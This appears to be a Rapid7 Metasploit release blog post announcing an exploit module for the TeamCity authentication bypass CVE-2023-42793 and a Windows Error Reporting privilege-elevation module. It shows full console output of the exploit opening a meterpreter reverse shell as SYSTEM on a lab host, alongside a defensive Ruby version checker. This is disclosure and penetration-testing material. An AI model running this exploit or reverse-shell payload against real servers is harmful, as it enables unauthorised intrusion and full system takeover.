Last updated at Mon, 02 Oct 2023 20:33:29 GMT
TeamCity authentication bypass and remote code execution
This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. All versions of TeamCity prior to 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource, and the Metasploit module was developed by Rapid7’s Principal Security Researcher Stephen Fewer, who also published a technical analysis of CVE-2023-42793 on AttackerKB. A Rapid7 TeamCity customer advisory has also been released with mitigation guidance.
This exploit works against both Windows and Linux targets. Example usage:
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                   192.168.159.10   yes       The target host(s)
   RPORT                    8111             yes       The target port (TCP)
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   TEAMCITY_ADMIN_ID        1                yes       The ID of an administrator account to authenticate as
   TEAMCITY_CHANGE_TIMEOUT  30               yes       The timeout to wait for the changes to be applied
   VHOST                                     no        HTTP server virtual host

Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      cymQYMMk         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected.
[*] Token already exists, deleting and generating a new one.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5
[*] Modifying internal.properties to allow process creation...
[*] Waiting for configuration change to be applied...
[*] Executing payload...
[*] Resetting the internal.properties settings...
[*] Sending stage (200774 bytes) to 192.168.250.237
[*] Waiting for configuration change to be applied...
[*] Deleting the authentication token.
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter >
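The module's automatic check keys off the server's version banner (the "JetBrains TeamCity 2023.05.3 (build 129390) detected" line above) and the fixed release named at the top of this post, 2023.05.4. The following Ruby is an added example of that triage step, not the Metasploit module's own check code and not Rapid7's: it parses a banner in the format shown in the console output, compares the release numerically rather than as a string, and reports whether the version falls before the fix. The sample banners are constructed for the example, and the cut-off is taken solely from the "prior to 2023.05.4" statement in this post.

```ruby
# Added example: classify a TeamCity version banner against the fixed
# release (2023.05.4) named in this post. Not the Metasploit module's
# own check; banner format taken from the console output shown above.

FIXED_VERSION = [2023, 5, 4].freeze

# Pull "YYYY.MM[.patch]" and the optional "(build N)" out of a banner.
# Returns nil when no TeamCity version is present.
def parse_teamcity_version(banner)
  m = banner.match(/TeamCity\s+(\d+)\.(\d+)(?:\.(\d+))?(?:\s+\(build\s+(\d+)\))?/i)
  return nil unless m

  {
    # A missing patch component is treated as .0 (e.g. 2023.05 -> 2023.5.0).
    version: [m[1].to_i, m[2].to_i, (m[3] || 0).to_i],
    raw: [m[1], m[2], m[3]].compact.join('.'),
    build: m[4] && m[4].to_i
  }
end

# Compare as integer tuples: as strings "2023.11" sorts before "2023.05.4",
# but as a release it is newer and therefore not affected.
def vulnerable_version?(version)
  (version <=> FIXED_VERSION) == -1
end

# Summarise one banner: :vulnerable, :patched, or :unknown (no banner).
def assess(banner)
  info = parse_teamcity_version(banner)
  return { status: :unknown } if info.nil?

  {
    status: vulnerable_version?(info[:version]) ? :vulnerable : :patched,
    version: info[:raw],
    build: info[:build]
  }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample banners for the example (not captured from real hosts).
  [
    'JetBrains TeamCity 2023.05.3 (build 129390)',
    'JetBrains TeamCity 2023.05.4',
    'JetBrains TeamCity 2023.11',
    'JetBrains TeamCity 2022.10.3',
    'nginx/1.24.0'
  ].each { |b| puts "#{b.ljust(46)} => #{assess(b)}" }
end
```

A version comparison is a triage signal only: it tells you a host is running an unpatched release, not that the exploit chain (token creation, the internal.properties change, process execution) will succeed against that particular deployment. Use the module's own check, or the vendor advisory, to confirm before reporting.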
New module content (2)
JetBrains TeamCity Unauthenticated Remote Code Execution
Description: This adds an unauthenticated RCE for JetBrains TeamCity server on both Linux and Windows. A remote attacker can exploit an authentication bypass vulnerability and then execute OS commands in the context of the service.
Microsoft Error Reporting Local Privilege Elevation Vulnerability
Description: This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the NT AUTHORITY\SYSTEM user. Note that this module works with Windows 10 x64 22H2.
Enhancements and features (1)
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
As always, you can update to the latest Metasploit Framework with
and you can get more details on the changes since the last blog post from
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).